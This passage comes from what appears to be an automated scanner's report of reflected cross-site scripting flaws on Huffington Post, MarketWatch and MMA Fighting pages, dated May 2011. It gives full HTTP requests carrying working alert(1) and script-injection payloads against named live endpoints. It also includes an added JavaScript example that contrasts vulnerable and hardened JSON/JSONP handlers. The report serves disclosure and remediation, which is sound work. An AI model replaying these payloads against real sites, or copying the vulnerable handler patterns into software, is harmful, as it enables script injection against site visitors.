window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous963b6<img src=a onerror=alert(1)>f99a809b4c3"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against
...[SNIP]...
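
The two endpoints in 2.24/2.25 (/ads/check_flights.php) and 2.27 to 2.29 (/badge/badges_json_v2.php) fail in the same way: a JSON or JSONP body is served as text/html with the reflected < left intact, and in the JSONP case the cb parameter is emitted verbatim as code. The block below is an added example, not code from the report or from the site it covers. It models both endpoints as plain handler functions returning { status, headers, body } so the behaviour can be checked offline; the handler names, the header set, the /**/ prefix and the 128-character callback limit are assumptions made for this example, and the payloads are copied from the findings above.

```javascript
// Added example, not code from the report or from the site it covers. Models the two JSON
// endpoints in the report as request handlers returning { status, headers, body } so that
// the vulnerable and hardened behaviour can be compared offline. Handler names, headers
// and the callback length limit are assumptions made for this example.

// Payloads copied from the report.
const CANARY_IMG = 'e44cb<img src=a onerror=alert(1)>247063d742';                              // 2.24/2.25
const CANARY_CB = 'window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b'; // 2.27
const GOOD_CB = 'window.Badges_217429195_1.slicesCallback';                                     // legitimate cb

// What the report's responses look like: a JSON body, but served as text/html and with the
// reflected '<' untouched. Opened directly in a browser, the body is parsed as HTML.
function vulnerableCheckFlights(query) {
  return {
    status: 200,
    headers: { 'Content-Type': 'text/html; charset=utf-8' },
    body: JSON.stringify({ result: false, spot: query.spot }),
  };
}

function vulnerableBadges(query) {
  const payload = { slice_names: String(query.sn || '').split(','), global_name: query.gn };
  return {
    status: 200,
    headers: { 'Content-Type': 'text/html; charset=utf-8' },
    body: query.cb + '(' + JSON.stringify(payload) + ');', // cb used verbatim as the callback
  };
}

// JSON.stringify never escapes '<', '>' or '&'. Replacing them with \uXXXX escapes keeps the
// output valid JSON (JSON.parse returns the original string) while making it inert if some
// client or proxy ever treats the bytes as HTML.
function safeJson(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Correct media type plus nosniff: the browser will not render the body as a document.
const JSON_HEADERS = {
  'Content-Type': 'application/json; charset=utf-8',
  'X-Content-Type-Options': 'nosniff',
};
const JSONP_HEADERS = {
  'Content-Type': 'application/javascript; charset=utf-8',
  'X-Content-Type-Options': 'nosniff',
};

function hardenedCheckFlights(query) {
  return { status: 200, headers: JSON_HEADERS, body: safeJson({ result: false, spot: query.spot }) };
}

// A JSONP callback is a dotted chain of JavaScript identifiers and nothing else. Anything
// that fails this test (brackets, angle brackets, quotes, whitespace) is rejected outright;
// encoding cannot help here because the value is emitted as code, not as a string.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function validCallback(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

function hardenedBadges(query) {
  if (!validCallback(query.cb)) {
    return { status: 400, headers: JSON_HEADERS, body: safeJson({ error: 'invalid callback' }) };
  }
  const payload = { slice_names: String(query.sn || '').split(','), global_name: query.gn };
  return {
    status: 200,
    headers: JSONP_HEADERS,
    // The leading comment stops the response from doubling as a valid file in other formats;
    // it is a common JSONP hardening and does not change how the callback runs.
    body: '/**/' + query.cb + '(' + safeJson(payload) + ');',
  };
}

// Triage helper for a captured response: raw markup in the body under an HTML media type?
function rendersAsHtml(response) {
  return /^text\/html/i.test(response.headers['Content-Type'] || '') && /<[a-z]/i.test(response.body);
}

console.log('vulnerable check_flights renders as HTML:', rendersAsHtml(vulnerableCheckFlights({ spot: CANARY_IMG })));
console.log('hardened   check_flights renders as HTML:', rendersAsHtml(hardenedCheckFlights({ spot: CANARY_IMG })));
console.log('hardened   badges, bad callback status  :', hardenedBadges({ cb: CANARY_CB, sn: 'a,b', gn: 'x' }).status);
console.log('hardened   badges, good callback body   :', hardenedBadges({ cb: GOOD_CB, sn: 'a,b', gn: 'x' }).body);
```

rendersAsHtml is the check to run over a scanner's captured responses: every hit is an endpoint whose body was never meant to be a document, and the first fix is the media type, not the encoding. The encoding in safeJson is still worth applying, because it costs nothing and protects clients that inject JSON values into the DOM.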

2.30. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The value of the vertical request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edefa"%3balert(1)//4a8362f1dd2 was submitted in the vertical parameter. This input was echoed as edefa";alert(1)//4a8362f1dd2 in the application's response.

Unlike 2.23, the sink here is the HPConfig.current_vertical_name assignment and the source is a named parameter the application reads. The payload closes the string, starts a new statement with alert(1), and the // comment swallows the remainder of the original line, which is why the trailing quotation mark and semicolon left behind by the template do not cause a syntax error.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /permalink-tracker.html?vertical=worldedefa"%3balert(1)//4a8362f1dd2 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=296
Date: Thu, 05 May 2011 01:00:36 GMT
Connection: close
Content-Length: 1352

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js"></script>
</head>
<body>
   <!-- Config -->    
   <script type="text/javascript">
       HPConfig.current_vertical_name = "worldedefa";alert(1)//4a8362f1dd2";
       HPConfig.current_web_address = "www.huffingtonpost.com";
       HPConfig.inst_type = "prod";
       HPConfig.timestamp_for_clearing_js = "1304533217";
   </script>
...[SNIP]...

2.31. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /users/logout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40592"-alert(1)-"6794a9a72f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the reflecting page is the logout handler: the response's Set-Cookie headers clear the huffpost_* session cookies, so a victim who follows a crafted link to this URL is logged out by the time the injected script runs, which limits what the payload can reach in the victim's session.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /users/logout/?40592"-alert(1)-"6794a9a72f1=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82841
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/users/logout/?40592"-alert(1)-"6794a9a72f1=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.32. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d8f8'%3bc73e17508a0 was submitted in the REST URL parameter 1. This input was echoed as 1d8f8';c73e17508a0 in the application's response.

The reflection is in the site's 404 error page (the response status is 404 Not Found), which writes the requested path into var p = '...' for its canonical-link handling, so any non-existent path under /News/ reaches the sink. The echoed value leaves the JavaScript parser with a dangling quotation mark after the injected text (var p = '/News1d8f8';c73e17508a0/Story/Story.aspx';), i.e. a syntax error rather than a working payload: the input is being parsed as code, but the scanner did not find a way to make the remainder of the line syntactically valid.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /News1d8f8'%3bc73e17508a0/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp05
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News1d8f8';c73e17508a0/Story/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.33. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e95c5'%3b27c78d71732 was submitted in the REST URL parameter 2. This input was echoed as e95c5';27c78d71732 in the application's response.

This is the same sink as 2.32 (the var p assignment on the 404 page), reached through the second path segment instead of the first.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /News/Storye95c5'%3b27c78d71732/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp04
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News/Storye95c5';27c78d71732/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.34. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd126"-alert(1)-"900ecbe9de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cd126"-alert(1)-"900ecbe9de5=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999932
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
="sportsillustrated.cnn.com,golf.com,fannation.com,sportsfanlive.com,sbnation.com";
s_265.mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://www.mmafighting.com/?cd126"-alert(1)-"900ecbe9de5=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.35. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a508"><script>alert(1)</script>5be8d4657ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6a508"><script>alert(1)</script>5be8d4657ca=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999950
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/?6a508"><script>alert(1)</script>5be8d4657ca=1" />
...[SNIP]...

2.36. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917bd"><script>alert(1)</script>fd80077afb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:43 GMT; path=/
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1" />
...[SNIP]...

2.37. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f06"-alert(1)-"1a6d26d7f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:44 GMT; path=/
Keep-Alive: timeout=5, max=999988
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Article";
s_265.prop9="bsd:19930968";
s_265.prop12="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1";
s_265.prop17="sources-fedor-hendo-fight-could-be-announced-within-24-72-hours";
s_265.prop19="mike-chiappetta";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_cod
...[SNIP]...

2.38. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa5f5"><script>alert(1)</script>b5c0de1ee4a was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a" />
...[SNIP]...

2.39. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2f3c"-alert(1)-"56010fc58d0 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
cle";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0";
